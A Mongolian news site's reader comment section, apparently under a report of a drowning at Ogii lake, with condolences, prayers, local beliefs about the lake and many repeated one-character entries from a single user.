aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

aiPxvpay [196.196.203.214] 2022-07-10 22:35:53

1

Zok [103.161.242.160] 2022-07-09 12:37:36

Zohion baiguulalt ih muu bj dee selj bgad shormos ni tatsan bol awragchid awrah bolomjtoido uug ni

Зочин [64.119.26.216] 2022-07-09 02:40:56

UM MA NI BAD MI HUM

Зочин [66.181.179.235] 2022-07-09 01:33:39

Нуур тогшин басаж болохгүйээ

Зочин [202.126.88.176] 2022-07-09 00:28:38

Usand selj baigaad ergees 10 m zaid guehen gazar genet selehee zogsood baisan gesen. Zurh bololtoi zailuul

zochin [59.153.86.115] 2022-07-08 12:29:18

ogii nuuriig hunii avlagatai nuur gdg yum bilee.

irgen [202.55.188.91] 2022-07-08 15:39:44

avlagtai bnu avlaggui bnu hmagui ee us gal salhi 3ig basaj blhgui

Зочин [59.153.114.182] 2022-07-08 10:58:06

Ум ма ни бад мэ хум.хөөрхий минь сайн төрлийг хурдан олох болтугай

Зочин [103.26.193.61] 2022-07-08 10:04:49

ХАРАМСАЛТАЙ

Мөнхжаргал [103.212.116.244] 2022-07-08 08:50:24

Харамсаад баршгүй

Гүнээ Эмгэнэл илэрхийлье. [66.181.176.56] 2022-07-08 08:48:53

Харамсаад барахгүй нь...УМ МА НИ БАД МЭ ХУМ

Зулаа [202.55.188.114] 2022-07-08 08:42:42

Маш харамсалтай! Эмгэнэл илэрхийлье!


379 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
379 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.